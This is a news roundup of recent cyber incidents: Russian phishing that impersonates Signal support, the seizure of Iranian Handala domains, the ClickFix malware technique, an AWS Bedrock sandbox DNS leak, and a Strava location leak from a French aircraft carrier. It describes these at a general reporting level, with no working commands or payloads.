Russians are posing as Signal support to launch phishing attacks
Foto: The Register
Thousands of accounts on the Signal platform have fallen victim to Russian intelligence groups impersonating the app's official technical support. The FBI and the Cybersecurity and Infrastructure Security Agency (CISA) have issued an urgent warning regarding a phishing campaign targeting politicians, journalists, military personnel, and former government officials. Attackers utilize social engineering, sending messages about alleged "suspicious activity" on the account and prompting victims to click a verification link. The attack mechanism is ruthless: users who provide their login credentials or 2FA codes on fraudulent websites lose full control over their communications. Russian hackers gain access to message history, contact lists, and the ability to send content on behalf of the victim. Although Signal remains one of the most secure messengers thanks to end-to-end encryption, these incidents demonstrate that even the strongest encryption becomes useless when faced with human error. For users worldwide, this is a clear signal that professional technical support services almost never initiate contact via direct messages within the application. Key safeguards remain verifying the identity of the interlocutor outside the communication channel and an absolute refusal to provide authorization codes on external websites. Digital security in 2026 relies no longer just on technology, but primarily on limiting trust in system communications.
Even the most advanced end-to-end encryption becomes useless when a user voluntarily opens the door for an attacker. This is a brutal lesson currently being served to the world by groups linked to Russian intelligence. According to the latest warning issued by the FBI and CISA, cybercriminals have begun mass impersonating Signal technical support, exploiting the trust that this platform enjoys among particularly privacy-conscious individuals.
The campaign is not accidental and hits precisely selected targets: former government officials, military personnel, politicians, and journalists. Using social engineering mechanisms, attackers take control of accounts, giving them unlimited insight into conversation history, contact lists, and the ability to send messages on behalf of the victim. This is a classic example of a spear-phishing operation, which shows that the weakest link in the security chain remains the human, not the application's source code.
Mechanism of the fraud: The "verification" trap
The attack begins with receiving a message that looks strikingly like an official communication from the Signal support team. The content usually informs of "suspicious activity" detected on the account and urges immediate action to avoid a lockout. The user is directed to an external site where they are supposed to undergo a verification process. In reality, it is a carefully prepared phishing site whose sole purpose is to capture authentication data or, worse, a 2FA (two-factor authentication) code.
Read also
If the victim enters the verification code on the spoofed site, the attackers immediately pair their account with their own device. From that moment on, they have full access to communications in real-time. The nature of Signal means that users often feel too secure, assuming that the app itself protects them from every form of surveillance. Russian operational groups exploit this psychological mechanism, turning a tool meant for secure communication into a direct access channel for intelligence.
- Targeting: Precisely selected individuals of high intelligence value.
- Method: Impersonating official technical support (Signal Support).
- Goal: Account takeover, theft of contact lists, and monitoring of correspondence.
- Consequence: Total compromise of confidential data despite the use of encryption.
Iranian information warfare and seized domains
While Russia focuses on quiet intelligence, the U.S. Department of Justice (DOJ) has taken radical steps against Iranian influence operations. Authorities seized four domains (including Justicehomeland[.]org and Handala-Hack[.]to) that were used by the Handala group. This group, considered an arm of the Iranian Ministry of Intelligence and Security (MOIS), was behind the high-profile attack on the medical company Stryker. A vulnerability in the Microsoft Intune service was exploited, allowing for the remote wiping of data from employees' devices.
However, Handala's activities went beyond pure cybercriminal vandalism. The seized websites were used to conduct aggressive psychological warfare, including publishing the personal data (doxxing) of IDF soldiers and spreading conspiracy theories and antisemitic myths. Despite the FBI blocking the infrastructure, representatives of the group published a statement online declaring the continuation of their activities, which clearly shows that the physical seizure of domains is only a temporary hindrance in the era of decentralized network infrastructure.
ClickFix and the new era of malicious bots
Parallel to state actions, the commercial sector is struggling with new techniques from ransomware groups such as LeakNet. Security reports indicate the growing popularity of the ClickFix method. Instead of traditional email attachments, criminals use compromised, legitimate websites to display fake "prove you are not a robot" dialog boxes. To pass verification, the user is instructed to use the Win + R shortcut and paste a command that allegedly connects to the Cloudflare Turnstile service.
In reality, this command launches the msiexec process, which downloads a loader based on the Deno runtime environment. A key aspect of this technique is the fact that the malicious code is executed directly in memory (in-memory), making it nearly invisible to traditional antivirus scanners focusing on files on the disk. This sophisticated approach allows relatively small criminal groups to effectively infect systems in large organizations, bypassing modern EDR (Endpoint Detection and Response) systems.
"The ClickFix technique is an evolution of social engineering – attackers no longer ask for a password; they ask for the execution of a single, seemingly trivial system command that gives them full power over the machine."
Cloud vulnerabilities and user carelessness
Security issues are also affecting infrastructure giants. The BeyondTrust Phantom Labs team revealed that the sandbox environment in the AWS Bedrock AgentCore service did not provide the declared isolation. Despite Amazon's assurances of total external access blocking, researchers discovered that DNS queries could leave the sandbox. Such a leak theoretically allows for the establishment of C2 (Command and Control) channels and data exfiltration from AI systems.
At the other end of the threat spectrum is mundane human carelessness, exemplified by the recent location leak of a French aircraft carrier. One of the sailors, using the Strava app to monitor a run across the vessel's deck, unknowingly shared a 7-kilometer route. The GPS data sent to the company's servers allowed for the precise tracking of the warship. This is further proof that in the age of ubiquitous IoT devices and wearables, operational security (OPSEC) is compromised by the simplest user habits.
Analyzing the above incidents, one can hypothesize that in the coming years, the focal point of cybersecurity will shift from infrastructure protection to the protection of identity and user decision-making processes. Since even advanced AWS sandboxes can be leaky, and secure messengers like Signal are used as attack vectors, the only effective barrier remains a radical change in the approach to online trust. We face an era of "digital pessimism," where every interaction, even one that looks like a system prompt, will have to be subjected to multi-level verification outside the main communication channel.
